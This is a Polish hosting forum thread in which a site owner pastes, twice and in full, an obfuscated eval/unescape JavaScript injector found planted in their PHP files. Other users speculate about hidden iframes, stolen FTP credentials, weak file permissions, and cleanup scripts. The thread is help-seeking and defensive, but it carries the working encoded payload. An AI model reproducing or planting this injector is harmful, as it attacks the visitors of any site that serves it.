Dziwny kod

[Pempek 0]

W plikach .php na moim serwerze wczoraj pojawił się dziwny kod:

                            <!-- [ 92cf7ac95c9da3964c1b277baa6e58d1 ] --><script>eval(unescape('function%20ggN%28brRU%29%7Bfunction%20qpR%28gEV0%2
9%7Bvar%20sJrOt%3D0%2ClQYOE%2Csue4s%3DgEV0.length%3Bfor%28lQYOE%3D0%3BlQYOE%3Csue4s%3BlQYOE++%29sJrOt+%3DgEV0.charCodeAt%28
lQYOE%29*sue4s%3Breturn%20new%20String%28sJrOt%29%7DbrRU%3Dunescape%28brRU%29%3Bvar%20vhbae%3Deval%28%27aPrPgEu%5EmEeOnPtOsE.
OcEaEl*l*ePeP%27.replace%28/%5B%5C*%5C%5EEPO%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27
%27%29%2CjGn%3DqpR%28vhbae%29%2ClzJkl%3Dnew%20String%28%29%2Cm0YeK%3D0%3Bq4sc%3D0%3Bfor%28var%20yUlEZ%3D0%3ByUlEZ%3CbrRU.le
ngth%3ByUlEZ++%29%7BlzJkl+%3DString.fromCharCode%28brRU.charCodeAt%28yUlEZ%29%5E%28vhbae.charCodeAt%28m0YeK%29%5EjGn.charCodeAt%28q4s
c%29%29%29%3Bm0YeK++%3Bq4sc++%3Bif%28m0YeK%3E%3Dvhbae.length%29m0YeK%
3D0%3Bif%28q4sc%3E%3DjGn.length%29q4sc%3D0%3B%7Deval%28lz
Jkl%29%3BlzJkl%3D%27%27%3Breturn%3B%7DggN%28%27%2532%2
530%2537%2536%2536%2533%2538%2532%2575%252f%252d%251a%
2535%250e%2545%257d%253c%2523%256f%253a%250b%2512%2527
%252c%256c%2512%2522%251c%2514%256c%253a%252a%2530%252
6%255d%2579%2559%253c%257b%257b%252a%2522%2501%2516%25
18%2576%252e%2567%256d%2524%2522%2524%251d%2506%257c%2
575%2531%253b%2571%253f%2523%2536%253b%2571%2560%252a%
2507%2503%250c%2513%2521%2525%2515%2508%250a%2553%2521
%257b%257d%2568%2524%252b%2546%252b%2518%2502%252e%255
0%2569%2544%2563%2535%255d%2516%256d%2568%2505%2531%25
3b%2521%255d%2532%2539%2520%2553%2500%253a%2513%250a%2
554%2554%256f%2520%2530%2577%2511%252d%253b%2529%256f%2
569%257e%2572%2573%2579%2556%2578%2570%256b%256e%2560%
2575%2555%257a%2557%2522%253f%2521%2510%250e%2526%2533
%2529%256f%2532%253e%2528%2538%253d%2524%254a%255a%256
4%253f%2524%252d%253b%2571%2572%2577%2575%257b%2574%25
7a%257c%2543%252f%2511%2536%2514%2532%253e%255b%2520%2
516%2530%2517%2521%2551%256e%2551%2526%2557%2534%250f%
2521%251b%2528%253f%2525%2555%2575%2549%257a%256b%2527
%2529%2518%2514%2505%2504%2501%2515%2510%253f%2578%253
e%256f%2566%2543%253e%2568%2538%2538%252b%255a%2532%25
34%252a%253f%2502%2502%2511%2552%2569%253d%252b%2573%2
575%2569%250d%2576%2507%2501%2531%2533%2560%2522%2575%
256c%2578%2513%2535%252f%257b%2505%2521%2539%2525%253c
%2537%2574%252e%2567%251e%2536%253d%253f%2526%2528%250
a%2529%2564%2533%2533%2524%256f%2560%2526%2518%2538%25
0d%2577%2533%256d%2565%2577%256b%252a%2529%2530%2564%2
57d%2563%2575%2549%257b%2550%2543%2528%2566%2507%2536%
251e%2542%256d%257d%2542%2545%253f%257a%252a%252a%2575
%2522%2534%2526%2543%2567%254b%2542%2579%253d%2514%253
8%253f%2503%252e%2524%253e%2538%2570%2530%2570%257b%25
7c%2521%2519%2533%2522%256b%2512%253c%2523%250f%2531%2
52e%2506%2531%256c%2527%2532%2537%2527%2559%2576%2573%
2569%2557%2560%2566%254e%257e%255e%254d%2524%2532%2539
%2577%2525%2579%2523%2533%2536%2527%2515%2577%257e%257
8%252a%251d%253a%252b%2510%256d%2554%2561%2559%2574%25
45%257a%2577%257e%256e%2556%2576%257d%2521%2512%2537%2
525%2567%2522%2536%257a%252e%2540%250a%255d%2568%2529%
256f%2573%2571%2577%2577%2528%254b%257c%255b%2563%2570
%2576%2572%2576%253c%252a%253d%2530%2522%256c%253c%253
0%2576%2539%2534%2512%2562%250c%2521%253b%256f%252f%253
4%2575%2558%2578%2536%2574%2575%2572%2575%2563%2575%25
67%2573%2523%2538%2571%257b%2529%2538%2529%252b%2562%2
553%2579%2528%2533%2525%250f%2576%2524%2521%2523%252c%
2579%2539%2574%2536%2522%2533%253a%252d%253b%250f%2539
%2538%252a%2519%256a%2573%2549%2500%253f%2529%253d%253
8%2523%2517%2539%2535%2522%2579%254d%2530%2510%2504%25
64%2521%253f%2525%252d%255f%256c%2518%2526%2572%2548%25
3e%2507%250f%252e%2501%2569%252c%252d%2531%252c%257b%2
575%2513%2514%2568%257b%252b%2534%2533%253b%256c%2576%
%252f%2520%2526%2543%2507%2542%2543%2530%2576%2501%255
c%255a%2547%2567%2573%2577%2530%2512%2567%2547%255f%25
0d%2547%2537%254a%2533%2540%2562%256d%252e%2558%2522%2
579%2502%2532%2508%2523%2528%253c%2500%2536%2500%252a%
252c%2544%2547%250a%2516%2535%252a%253c%2565%2524%256a
%257d%2519%2511%251d%250d%252e%250b%2563%2538%2578%251
9%2575%2531%2579%2561%255d%2562%2550%256e%253e%2577%25
47%2540%257e%253f%253c%2537%2578%252f%2523%2525%2572%25
2c%2559%2553%257e%2530%257c%2528%2563%253c%257c%2578%2
57f%2521%2578%2563%2532%2549%2537%2513%2536%250e%2533%
252d%255d%251f%2518%252c%250b%2562%251b%252d%251a%2576
%250b%257d%253b%2538%2503%2536%2572%2520%2507%253d%250
7%2579%252d%257f%2569%2571%2534%257b%253a%2518%250c%25
1a%2523%2573%2531%256e%256d%2547%2577%2569%2562%252b%2
534%256c%2534%252f%252c%257e%253e%256f%252e%255a%2533%2
579%253a%2567%257c%256a%250e%2552%2507%2514%2568%257f%
2571%253c%257f%257e%2579%2545%257c%2525%2535%250b%2523
%252a%2538%2536%2539%2536%2575%2536%250e%2538%252b%252
3%2525%252b%2543%2562%256c%253b%2532%253c%256b%2532%25
65%2500%2527%2553%2560%2526%2569%252a%253a%2562%257e%2
530%252f%252a%2536%2538%2506%2504%2572%2507%2501%2561%
2538%2549%253f%251d%2503%253f%2528%250f%2529%257d%2531%
2537%2578%257a%2567%2577%2576%2540%257c%2559%254c%252e
%2521%251b%252a%2570%2500%252c%252b%2534%2534%253a%254
a%2535%252e%252d%253e%255c%257b%2564%257d%2551%2572%25
62%257a%256f%253c%2546%250f%2573%2520%252b%256d%2563%25
12%2525%2523%2523%255c%252e%252e%250d%2571%251e%2506%2
563%2574%253c%2539%2520%2569%253a%2536%253f%2562%254e%
2579%2534%2523%2517%2525%252b%2569%2501%253d%2555%2570
%2504%2535%257a%257b%257e%2523%252c%2519%2524%2578%253
6%251d%2531%2522%2563%2524%2522%2516%256c%251a%2526%25
1c%252b%256b%252e%2535%2573%257f%2573%257d%2519%2537%2
501%2564%2529%256f%2574%256f%2546%253b%251c%2535%2576%2
532%251e%257b%2553%2519%2511%250d%255c%2520%2504%252b%
2543%2525%251a%2565%2520%2502%253e%250f%2537%2508%2536
%2513%2529%251f%2573%2566%2539%254f%253c%2505%252a%2502
%2561%2512%2512%250d%253b%2500%2526%2524%2539%250f%251
8%2571%2512%2579%2501%2562%2510%252a%2514%2536%2519%25
29%257e%253f%2573%253c%2539%2534%2514%2540%2532%2525%2
503%252a%2514%2524%2510%2560%251d%251d%2560%2525%2573%
2558%251c%2567%2534%253d%2524%2526%2519%2569%2558%251d
%2521%2549%251a%253b%2531%2530%2520%2531%2526%2569%257
2%2525%2562%257d%2556%2510%256a%2577%2528%257d%253f%253
1%2538%251c%2526%253e%2528%253f%2532%2538%253b%255f%252
b%2577%2544%2533%255e%2542%2575%2502%256b%255c%256b%25
02%250e%2502%2511%252f%2533%253f%2524%2511%252f%2511%251
8%251a%253c%2546%2568%2506%2578%2504%251f%2569%253f%253
d%2500%253c%2564%250a%2543%2553%2505%2526%2532%253f%256
3%2523%252f%257f%2569%251e%2571%2500%2526%253e%250a%253
c%2569%2525%2572%2578%2576%2567%255b%257b%2509%2536%25
2c%2564%251f%2510%252c%252e%2577%252c%2569%2533%2529%25
35%252f%252d%2505%250b%2535%256c%252b%256b%253f%2520%25
36%253b%257a%2569%256c%2530%2577%2515%2532%2509%2524%2
516%256b%252d%2554%256c%2512%2570%2504%252e%2516%2533%
2518%2534%2554%2568%250f%2534%2512%252b%2537%253f%254a%
2530%254e%2563%2520%2539%252b%252b%253e%2536%253c%2507
%2548%250b%252d%2577%2568%2521%2570%2542%257e%250c%253
9%251a%2521%2549%2528%2538%252a%2512%2567%253a%256b%25
36%2534%254c%2523%2568%2571%254d%250a%2550%2553%252f%
%2531%2567%2530%256e%2570%253c%2512%253d%256a%2567%253
b%2518%257c%2518%253c%2515%2548%2509%2567%251f%2577%257
b%257f%2574%256d%2540%2535%256b%257e%2565%2521%2535%252
e%256a%2535%2538%2550%2563%2519%257b%256b%2565%2572%256
8%2574%256a%250e%253f%2531%2535%253a%2533%2528%2501%257
6%2571%2516%2573%2559%251a%2537%2535%2508%2502%257e%253
1%257f%2573%250c%251f%2575%2513%253b%2524%2539%2534%2502
%2510%2553%253a%2573%254b%2561%2567%2570%2570%252c%256c
%253d%2523%252e%2571%2500%253a%2523%2507%251f%2538%253d
%253e%2537%256d%2510%250b%2574%2528%2574%2530%252d%251b
%2532%253b%2533%2537%2527%2526%2500%2577%2553%2518%252d
%2539%2523%257d%2536%2576%253a%2535%253b%252f%2527%253c
%2538%2527%2512%256b%2565%2575%2516%257b%250b%253c%2505
%2530%2527%257c%2575%2534%2521%251d%253a%253b%2578%251a
%2528%256c%2523%2539%256e%252d%2562%2513%2577%2516%2522
%256b%252a%2568%2534%253b%2528%2522%2511%2506%2533%2531
%2534%2572%257a%256c%2571%2538%253b%2537%257a%2525%2534
%252c%2574%250f%253f%2511%252b%2578%256f%27%29%3B'));</script>
<!-- end -->eval(unescape('function%20ggN%28brRU%29%7Bfunction%20qpR%28gEV0%29%7Bvar%20sJrOt%3D0%2ClQYOE%2Csue4s
%3DgEV0.length%3Bfor%28lQYOE%3D0%3BlQYOE%3Csue4s%3BlQYOE++%29sJrOt+%3DgEV0.charCodeAt%28lQYOE%29*sue4s%3Br
eturn%20new%20String%28sJrOt%29%7DbrRU%3Dunescape%28brRU%29%3Bvar%20vhbae%3Deval%28%27aPrPgEu%5EmEeOnPtOs
E.OcEaEl*l*ePeP%27.replace%28/%5B%5C*%5C%5EEPO%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-
9A-Z_.%2C-%5D/g%2C%27%27%29%2CjGn%3DqpR%28vhbae%29%2ClzJkl%3Dnew%20String%28%29%2Cm0YeK%3D0%3Bq4sc%3D
0%3Bfor%28var%20yUlEZ%3D0%3ByUlEZ%3CbrRU.length%3ByUlEZ++%29%7BlzJkl+%3DString.fromCharCode%28brRU.charCodeAt%2
8yUlEZ%29%5E%28vhbae.charCodeAt%28m0YeK%29%5EjGn.charCodeAt%28q4sc%29%29%29%3Bm0YeK++%3Bq4sc++%3Bif%28m0Y
eK%3E%3Dvhbae.length%29m0YeK%3D0%3Bif%28q4sc%3E%3DjGn.length%29q4sc%3D0%3B%7Deval%28lzJkl%29%3BlzJkl%3D%27%
27%3Breturn%3B%7DggN%28%27%2532%2530%2537%2536%2536%2533%2538%2532%2575%252f%252d%251a%2535%250e%2545%
257d%253c%2523%256f%253a%250b%2512%2527%252c%256c%2512%2522%251c%2514%256c%253a%252a%2530%2526%255d%25
79%2559%253c%257b%257b%252a%2522%2501%2516%2518%2576%252e%2567%256d%2524%2522%2524%251d%2506%257c%257
5%2531%253b%2571%253f%2523%2536%253b%2571%2560%252a%2507%2503%250c%2513%2521%2525%2515%2508%250a%2553%
2521%257b%257d%2568%2524%252b%2546%252b%2518%2502%252e%2550%2569%2544%2563%2535%255d%2516%256d%2568%2
505%2531%253b%2521%255d%2532%2539%2520%2553%2500%253a%2513%250a%2554%2554%256f%2520%2530%2577%2511%252
d%253b%2529%256f%2569%257e%2572%2573%2579%2556%2578%2570%256b%256e%2560%2575%2555%257a%2557%2522%253f%
2521%2510%250e%2526%2533%2529%256f%2532%253e%2528%2538%253d%2524%254a%255a%2564%253f%2524%252d%253b%25
71%2572%2577%2575%257b%2574%257a%257c%2543%252f%2511%2536%2514%2532%253e%255b%2520%2516%2530%2517%2521
%2551%256e%2551%2526%2557%2534%250f%2521%251b%2528%253f%2525%2555%2575%2549%257a%256b%2527%2529%2518%2
514%2505%2504%2501%2515%2510%253f%2578%253e%256f%2566%2543%253e%2568%2538%2538%252b%255a%2532%2534%252
a%253f%2502%2502%2511%2552%2569%253d%252b%2573%2575%2569%250d%2576%2507%2501%2531%2533%2560%2522%2575%
256c%2578%2513%2535%252f%257b%2505%2521%2539%2525%253c%2537%2574%252e%2567%251e%2536%253d%253f%2526%25
28%250a%2529%2564%2533%2533%2524%256f%2560%2526%2518%2538%250d%2577%2533%256d%2565%2577%256b%252a%2529
%2530%2564%257d%2563%2575%2549%257b%2550%2543%2528%2566%2507%2536%251e%2542%256d%257d%2542%2545%253f%
257a%252a%252a%2575%2522%2534%2526%2543%2567%254b%2542%2579%253d%2514%2538%253f%2503%252e%2524%253e%25
38%2570%2530%2570%257b%257c%2521%2519%2533%2522%256b%2512%253c%2523%250f%2531%252e%2506%2531%256c%2527
%2532%2537%2527%2559%2576%2573%2569%2557%2560%2566%254e%257e%255e%254d%2524%2532%2539%2577%2525%2579%
2523%2533%2536%2527%2515%2577%257e%2578%252a%251d%253a%252b%2510%256d%2554%2561%2559%2574%2545%257a%2
577%257e%256e%2556%2576%257d%2521%2512%2537%2525%2567%2522%2536%257a%252e%2540%250a%255d%2568%2529%25
6f%2573%2571%2577%2577%2528%254b%257c%255b%2563%2570%2576%2572%2576%253c%252a%253d%2530%2522%256c%253c
%2530%2576%2539%2534%2512%2562%250c%2521%253b%256f%252f%2534%2575%2558%2578%2536%2574%2575%2572%2575%2
563%2575%2567%2573%2523%2538%2571%257b%2529%2538%2529%252b%2562%2553%2579%2528%2533%2525%250f%2576%252
4%2521%2523%252c%2579%2539%2574%2536%2522%2533%253a%252d%253b%250f%2539%2538%252a%2519%256a%2573%2549%
2500%253f%2529%253d%2538%2523%2517%2539%2535%2522%2579%254d%2530%2510%2504%2564%2521%253f%2525%252d%25
5f%256c%2518%2526%2572%2548%253e%2507%250f%252e%2501%2569%252c%252d%2531%252c%257b%2575%2513%2514%2568
%257b%252b%2534%2533%253b%256c%2576%252b%252f%2520%2526%2543%2507%2542%2543%2530%2576%2501%255c%255a%
2547%2567%2573%2577%2530%2512%2567%2547%255f%250d%2547%2537%254a%2533%2540%2562%256d%252e%2558%2522%25
79%2502%2532%2508%2523%2528%253c%2500%2536%2500%252a%252c%2544%2547%250a%2516%2535%252a%253c%2565%252
4%256a%257d%2519%2511%251d%250d%252e%250b%2563%2538%2578%2519%2575%2531%2579%2561%255d%2562%2550%256e
%253e%2577%2547%2540%257e%253f%253c%2537%2578%252f%2523%2525%2572%252c%2559%2553%257e%2530%257c%2528%2
563%253c%257c%2578%257f%2521%2578%2563%2532%2549%2537%2513%2536%250e%2533%252d%255d%251f%2518%252c%250
b%2562%251b%252d%251a%2576%250b%257d%253b%2538%2503%2536%2572%2520%2507%253d%2507%2579%252d%257f%2569%
2571%2534%257b%253a%2518%250c%251a%2523%2573%2531%256e%256d%2547%2577%2569%2562%252b%2534%256c%2534%2
52f%252c%257e%253e%256f%252e%255a%2533%2579%253a%2567%257c%256a%250e%2552%2507%2514%2568%257f%2571%253c
%257f%257e%2579%2545%257c%2525%2535%250b%2523%252a%2538%2536%2539%2536%2575%2536%250e%2538%252b%2523%
2525%252b%2543%2562%256c%253b%2532%253c%256b%2532%2565%2500%2527%2553%2560%2526%2569%252a%253a%2562%2
57e%2530%252f%252a%2536%2538%2506%2504%2572%2507%2501%2561%2538%2549%253f%251d%2503%253f%2528%250f%2529
%257d%2531%2537%2578%257a%2567%2577%2576%2540%257c%2559%254c%252e%2521%251b%252a%2570%2500%252c%252b%
2534%2534%253a%254a%2535%252e%252d%253e%255c%257b%2564%257d%2551%2572%2562%257a%256f%253c%2546%250f%25
73%2520%252b%256d%2563%2512%2525%2523%2523%255c%252e%252e%250d%2571%251e%2506%2563%2574%253c%2539%252
0%2569%253a%2536%253f%2562%254e%2579%2534%2523%2517%2525%252b%2569%2501%253d%2555%2570%2504%2535%257a%
257b%257e%2523%252c%2519%2524%2578%2536%251d%2531%2522%2563%2524%2522%2516%256c%251a%2526%251c%252b%2
56b%252e%2535%2573%257f%2573%257d%2519%2537%2501%2564%2529%256f%2574%256f%2546%253b%251c%2535%2576%2532
%251e%257b%2553%2519%2511%250d%255c%2520%2504%252b%2543%2525%251a%2565%2520%2502%253e%250f%2537%2508%
2536%2513%2529%251f%2573%2566%2539%254f%253c%2505%252a%2502%2561%2512%2512%250d%253b%2500%2526%2524%25
39%250f%2518%2571%2512%2579%2501%2562%2510%252a%2514%2536%2519%2529%257e%253f%2573%253c%2539%2534%2514
%2540%2532%2525%2503%252a%2514%2524%2510%2560%251d%251d%2560%2525%2573%2558%251c%2567%2534%253d%2524%
2526%2519%2569%2558%251d%2521%2549%251a%253b%2531%2530%2520%2531%2526%2569%2572%2525%2562%257d%2556%2
510%256a%2577%2528%257d%253f%2531%2538%251c%2526%253e%2528%253f%2532%2538%253b%255f%252b%2577%2544%2533%255e%2542%2575%2502%256b%255c%256b%2502%250
e%2502%2511%252f%2533%253f%2524%2511%252f%2511%2518%251a%253c%2546%2568%2506%2578%2504%251f%2569%253f%253d%2500%253c%2564%250a%2543%2553%2505%2526%2
532%253f%2563%2523%252f%257f%2569%251e%2571%2500%2526%253e%250a%253c%2569%2525%2572%2578%2576%2567%255b%257b%2509%2536%252c%2564%251f%2510%252c%252e
%2577%252c%2569%2533%2529%2535%252f%252d%2505%250b%2535%256c%252b%256b%253f%2520%2536%253b%257a%2569%256c%2530%2577%2515%2532%2509%2524%2516%256b%
252d%2554%256c%2512%2570%2504%252e%2516%2533%2518%2534%2554%2568%250f%2534%2512%252b%2537%253f%254a%2530%254e%2563%2520%2539%252b%252b%253e%2536%25
3c%2507%2548%250b%252d%2577%2568%2521%2570%2542%257e%250c%2539%251a%2521%2549%2528%2538%252a%2512%2567%253a%256b%2536%2534%254c%2523%2568%2571%254
d%250a%2550%2553%252f%253f%2531%2567%2530%256e%2570%253c%2512%253d%256a%2567%253b%2518%257c%2518%253c%2515%2548%2509%2567%251f%2577%257b%257f%2574%
256d%2540%2535%256b%257e%2565%2521%2535%252e%256a%2535%2538%2550%2563%2519%257b%256b%2565%2572%2568%2574%256a%250e%253f%2531%2535%253a%2533%2528%2
501%2576%2571%2516%2573%2559%251a%2537%2535%2508%2502%257e%2531%257f%2573%250c%251f%2575%2513%253b%2524%2539%2534%2502%2510%2553%253a%2573%254b%256
1%2567%2570%2570%252c%256c%253d%2523%252e%2571%2500%253a%2523%2507%251f%2538%253d%253e%2537%256d%2510%250b%2574%2528%2574%2530%252d%251b%2532%253b
%2533%2537%2527%2526%2500%2577%2553%2518%252d%2539%2523%257d%2536%2576%253a%2535%253b%252f%2527%253c%2538%2527%2512%256b%2565%2575%2516%257b%250b%
253c%2505%2530%2527%257c%2575%2534%2521%251d%253a%253b%2578%251a%2528%256c%2523%2539%256e%252d%2562%2513%2577%2516%2522%256b%252a%2568%2534%253b%2
528%2522%2511%2506%2533%2531%2534%2572%257a%256c%2571%2538%253b%2537%257a%2525%2534%252c%2574%250f%253f%2511%252b%2578%256f%27%29%3B'));

 

Skąd mógł on się tam wziąć? Nie wiem co jest nie tak z zabezpieczeniami. Dodam, że to już drugi raz.

 

 

Ja piernicze!!!

Ludzie - skracajcie kod, łamcie go na linie, itp. aby forum nie rozwalało się !!

 

wrrr....arrghhh....

BlueMan

[Krystian 17]

<script>eval(unescape....

 

Zakodowany skrypt JS. Możliwe że ktoś przez to ładuje Ci się na serwer

Niech administrator sprawdzi lepiej Twój serwer

[MasterNETpl 100]

Sprawdź lepiej czy skrypt nie jest dziurawy, uprawnienia chmod.

Kiedyś słyszałem, że pewiem klient FTP czasem potrafił dokleić kawałek kodu js w przysyłanych plikach.

 

No i przez Ciebie forum się rozjechało w poziomie

[jacek_b 0]

U jednego klienta działo się tak co drugi dzień...to była Joomla... ale tylko u jednego! Sprawca pochodził ze Wschodu, stworzyliśmy prościutki skrypt, który dziennie czyścił pliki php. Niestety nic nie dało się zrobić, (tzn na pewno by się dało...) stronka została zamknięta, dysk sformatowany.

[p 3]

stworzyliśmy prościutki skrypt, który dziennie czyścił pliki php.

Ja bym się takimi rzeczami publicznie nie 'chwalił'...

[jacek_b 0]

Ja bym się takimi rzeczami publicznie nie 'chwalił'...

 

Co znaczy "nie chwalił"? Na "dziurawy" skrypt, który łatwo zhakować nie ma siły, żaden usługodawca nie jest w stanie sprawdzać jakości aplikacji wszystkich klientów, sztuką jest właśnie, ograniczenie takich "szkód" do jednej domeny - świadczy to raczej o odporności systemu.... albo się mylę???

 

Nawiasem mówiąc serwer był w prywatnych rękach, sytuacja nie pozwalała na radykalne zmiany, stąd takie doraźne rozwiązanie.

 

a po trzecie.... kogo mamy tu udawać? Największym zdarzają się wpadki, nie oszukujmy samych siebie, myślałem, że to forum dla fachowców...

 

Pozdr

[Noone 19]

Możliwe też że przez źle zabezpieczony system użytkownika (w domu/pracy) i np. dziurawy jak ser szwajcarski Total Commander dochodzi do włamania.

[Krystian 17]

Powoli To nie jest raczej super hiper tajny system by włamywacz szukał luki np. w GG i przez to zdobywał dane do serwera gdzie jest ta stronka. Według mnie wina leży w złych chmodach i dzięki temu ktoś dopisuje dane do plików i wrzuca ten kod JS (który zapewne jest iframe'em)

 

@jacek_b: Bardzo "pro" rozwiązanie. Skoro nie uważasz się za fachowca w tym czym robisz zastanów się nad zmianą pracy. Nie wyobrażam sobie jak można takim sposobem naprawić problem bezpieczeństwa. Twoja metoda z tym "skryptem" który co jakiś czas "naprawia" stronę Twojego klienta to najgłupszy pomysł jaki w życiu słyzałem. Skoro jest gdzieś dziura nie można to zamaskować takim czymś tylko trzeba ją namierzyć i załatać.

[ednet 136]

na kilku stronach widzialem takie kody i po rozkodowaniu zauwazylem ze zawierały one ukrytą ramkę z linkami do innych stron (sex, drugz & rock'roll)

Niektóre kody dodatkowo "zjadały" cały RAM komputera klienta ogloądającego stronę.

 

A z ciekawostek to mozna dodać że google takie strony oznaczają w wynikach wyszukiwania jako szkodliwe.

 

Edit: a te kody pojawiały się najczęsciej nie przez dziurę w zabezpieczeniach serwera, ale na 100% jestem pewien że przez trojany na komputerze webmastera mającego dostęp do ftpa.

 

Ed

[p 3]

Co znaczy "nie chwalił"? Na "dziurawy" skrypt, który łatwo zhakować nie ma siły, żaden usługodawca nie jest w stanie sprawdzać jakości aplikacji wszystkich klientów, sztuką jest właśnie, ograniczenie takich "szkód" do jednej domeny - świadczy to raczej o odporności systemu.... albo się mylę???

Ale przecież nikt od Ciebie nie wymaga abyś robił audyty stron, które hostujesz

 

Nawiasem mówiąc serwer był w prywatnych rękach, sytuacja nie pozwalała na radykalne zmiany, stąd takie doraźne rozwiązanie.

Takie co? Ten skrypt koło żadnego rozwiązania nawet na dysku nie leżał... Nie wspominając już o tym, że podsuwanie komuś takich rzeczy uważam za gorsze niż stwierdzenie, że nie potrafi się pomóc... Bo sprawia, że klient uważa, że problem został rozwiązany...

...resztę napisał juz Krystian.

[jacek_b 0]

[quote name='Krystian' date='26.09.2008, 08:25' post='121101'

 

@jacek_b: Bardzo "pro" rozwiązanie. Skoro nie uważasz się za fachowca w tym czym robisz zastanów się nad zmianą pracy. Nie wyobrażam sobie jak można takim sposobem naprawić problem bezpieczeństwa. Twoja metoda z tym "skryptem" który co jakiś czas "naprawia" stronę Twojego klienta to najgłupszy pomysł jaki w życiu słyszałem. Skoro jest gdzieś dziura nie można to zamaskować takim czymś tylko trzeba ją namierzyć i załatać.

 

Tak samo jak ja sobie nie wyobrażam usługodawcy, który mi na siłę ustawia mój hosting. Administracja serwera dedykowanego należy do jego użytkownika, on decyduje o poziomie jego bezpieczeństwa i może sobie go mieć dziurawy jak chce... oczywiście jeżeli w efekcie staje się źródłem ataków dos, lub podrzucania wirusów i innych robaków, serwer zostaje zablokowany, ale dopiero wówczas.

 

Nie jestem informatykiem i nie muszę zmieniać pracy... trudno się wypowiadać na temat zmiany przez kogoś pracy, nie mając pojęcia, co należy do jego obowiązków...

 

... skrypt służył do wyczyszczania setek plików php i html z tego kodu po próbach załatania systemu, do czasu, gdy okazało się to jego zajęciem bez końca. Czyścił dziennie, bo dziennie pojawiał się nowy... Zdanie było wyciągnięte z kontekstu.. podziałało na niektórych jak czerwona płachta na byka...

[Gość Pokuć]

Może i nie mam pojęcia o wielu rzeczach ale po przeczytaniu paru postów powyżej z tym kodem co czyści to uważam że provider/ pośrednik nie ma w obowiązku dbać o skrypty klienta. to OBOWIĄZKIEM klienta jest dbanie o bezpieczeństwo i nie dziurawość ów skryptu.